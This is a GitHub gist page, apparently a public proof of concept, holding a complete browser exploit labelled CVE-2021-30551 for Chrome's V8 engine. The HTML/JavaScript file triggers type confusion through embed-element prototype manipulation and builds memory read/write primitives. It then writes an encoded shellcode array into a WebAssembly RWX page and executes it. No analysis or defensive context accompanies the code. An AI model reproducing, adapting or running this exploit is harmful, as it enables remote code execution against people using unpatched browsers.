Created
July 15, 2021 08:04
-
-
Save r4j0x00/5b2ce4e4c1c48c8fc97c372bef4436f8 to your computer and use it in GitHub Desktop.
CVE-2021-30551
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <body> | |
| </body> | |
| <script> | |
| var buf = new ArrayBuffer(8); | |
| var f64_buf = new Float64Array(buf); | |
| var u64_buf = new Uint32Array(buf); | |
| let buf2 = new ArrayBuffer(0x150); | |
| function ftoi(val) { | |
| f64_buf[0] = val; | |
| return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); | |
| } | |
| function itof(val) { | |
| u64_buf[0] = Number(val & 0xffffffffn); | |
| u64_buf[1] = Number(val >> 32n); | |
| return f64_buf[0]; | |
| } | |
| global_object = {}; | |
| setPropertyViaEmbed = (object, value, handler) => { | |
| const embed = document.createElement('embed'); | |
| embed.onload = handler; | |
| embed.type = 'text/html'; | |
| Object.setPrototypeOf(global_object, embed); | |
| document.body.appendChild(embed); | |
| object.corrupted_prop = value; | |
| embed.remove(); | |
| } | |
| createCorruptedPair = (value_1, value_2) => { | |
| const object_1 = { | |
| __proto__: global_object | |
| }; | |
| object_1.regular_prop = 1; | |
| setPropertyViaEmbed(object_1, value_2, () => { | |
| Object.setPrototypeOf(global_object, null); | |
| object_1.corrupted_prop = value_1; | |
| }); | |
| const object_2 = { | |
| __proto__: global_object | |
| }; | |
| object_2.regular_prop = 1; | |
| setPropertyViaEmbed(object_2, value_2, () => { | |
| Object.setPrototypeOf(global_object, null); | |
| object_2.corrupted_prop = value_1; | |
| object_1.regular_prop = 1.1 | |
| }); | |
| return [object_1, object_2]; | |
| } | |
| const array = [1.1]; | |
| array.prop = 1; | |
| const [object_1, object_2] = createCorruptedPair(array, 5.8636505369363415e-270); | |
| var new_arr = [13.37, 13.38]; | |
| var obj_arr = [{}, 1234]; | |
| jit = (object, idx, value) => { | |
| if(value) | |
| object.corrupted_prop[idx] = value; | |
| return object.corrupted_prop[idx]; | |
| } | |
| for (var i = 0; i < 100000; ++i) | |
| jit(object_1, 0, 1.1); | |
| var float_array_map; | |
| for(var i=0; i<20000; ++i) { | |
| if(jit(object_2, i, 0) == 13.37) { | |
| console.log(i); | |
| var leak = ftoi(jit(object_2, i+3, 0)); | |
| float_array_map = jit(object_2, i+2, 0); | |
| jit(object_2, i+3, itof(leak+(1337n<<32n))); | |
| break; | |
| } | |
| } | |
| for(var i=0; i<200; ++i) { | |
| if((ftoi(new_arr[i]) >> 32n) == 2468n) { | |
| console.log(i); | |
| break; | |
| } | |
| } | |
| const idx = i; | |
| function addrof(k) { | |
| obj_arr[0] = k; | |
| return ftoi(new_arr[idx]) & 0xffffffffn; | |
| } | |
| function fakeobj(k) { | |
| new_arr[idx] = itof(k); | |
| return obj_arr[0]; | |
| } | |
| var arr2 = [float_array_map, 1.2, 2.3, 3.4]; | |
| var fake = fakeobj(addrof(arr2) + 0x20n); | |
| function arbread(addr) { | |
| if (addr % 2n == 0) { | |
| addr += 1n; | |
| } | |
| arr2[1] = itof((2n << 32n) + addr - 8n); | |
| return (fake[0]); | |
| } | |
| function arbwrite(addr, val) { | |
| if (addr % 2n == 0) { | |
| addr += 1n; | |
| } | |
| arr2[1] = itof((2n << 32n) + addr - 8n); | |
| fake[0] = itof(BigInt(val)); | |
| } | |
| function copy_shellcode(addr, shellcode) { | |
| let dataview = new DataView(buf2); | |
| let buf_addr = addrof(buf2); | |
| let backing_store_addr = buf_addr + 0x14n; | |
| arbwrite(backing_store_addr, addr); | |
| for (let i = 0; i < shellcode.length; i++) { | |
| dataview.setUint32(4*i, shellcode[i], true); | |
| } | |
| } | |
| var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) | |
| var wasm_mod = new WebAssembly.Module(wasm_code); | |
| var wasm_instance = new WebAssembly.Instance(wasm_mod); | |
| var f = wasm_instance.exports.main; | |
| var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); | |
| console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16)); | |
| var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; | |
| copy_shellcode(rwx_page_addr, shellcode); | |
| f(); | |
| </script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment